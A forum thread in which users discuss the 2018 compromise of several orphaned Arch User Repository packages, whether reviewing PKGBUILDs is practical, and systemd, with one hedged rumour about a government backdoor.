Arch User Repository compromised


#1

https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html

years ago I decided against using Arch because of the user repository (and the seeming lack of scrutiny) amazed it took someone this long…

Lets hope the come up with some kind of community based cross checking (and that its not too complicated!)


#2

and interestingly

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…


(karl-k) #3

Yeah this was an obvious flaw of systemd, makes it very easy to compromise security, but I wouldn’t say the AUR is at fault for that, the AUR is a user repository & everyone who uses it should thoroughly check out their PKGBUILDs for anything weird like that, when you use the AUR you are using it at your own risk. never forget that.

I remember reading a post that claimed the people who develop systemd(Fedora/RedHat), their biggest customer is the US govt, and that if there was ever a “backdoor” to Linux while Linus is still alive that it’d be through systemd (US govt is trying to do this, I guess was what was implied, I am probably butchering what I remember, sorry.), not sure how credible that claim is but it reminded me of that.


#4

I don’t think checking PKGBUILDs is even vaguely realistic, you really gonna do it for each and every update ?


(maxice8 alter) #5

it is what people on reddit say it is expected while 0.9% do it


#6

You sir are totally right,- I agree with your statement.

Biggest customer always has the biggest impact on software.


(Gus Fun) #7

You can use Arch without access to anything from AUR, the official repositories are still only second to Debian without AUR.
What is actually hard for the newcomer is to find a way to access AUR.
Still, those were three orphaned pkgs in the tens of thousands that someone took over and added a malicious hack and the few that used them disregarded to look through the pkgbuilt’s edits.

As it seems the problem was caught and eliminated quickly.
Thousands of hard working coders have found a place to build their careers and names in AUR and there is a very positive aspect of the existence of AUR in this respect. After all it is open and free code.


(maxice8 alter) #8

Gentoo is the one with most applications, so arch is the third if that were true and not a bad joke.


#9

using Arch without AUR must have changed markedly since I last used it (an it has been a number of years!) as it only seemed to have the very core of an OS

at the end of the day expecting everyone to look through every pkgbuild for every update because a lack of a basic security mechanism is unrealistic and is sadly a severe issue with Arch…


(Ben) #10

Disagree completely with the general tenor of this discussion. It’s totally viable to check all pkgbuilds, as long as you have a workflow that values regular updates (you don’t do loads of packages at a time) and allows for textual diffs. You check the whole thing only once. 99% of builds are super simple and if I can’t understand a pkgbuild I don’t include it. The vast majority of my packages come from the main distro. Easy. Better the AUR than having to build and manage those sources myself. Even checking for upstream updates would be more of a chore than reading the pkgbuilds.

Threads slagging off other distros are borish and petty and fundamentally speak to a lack of interesting conversation to be had around void, which is a shame because it is interesting in its own right.


(Erin) #11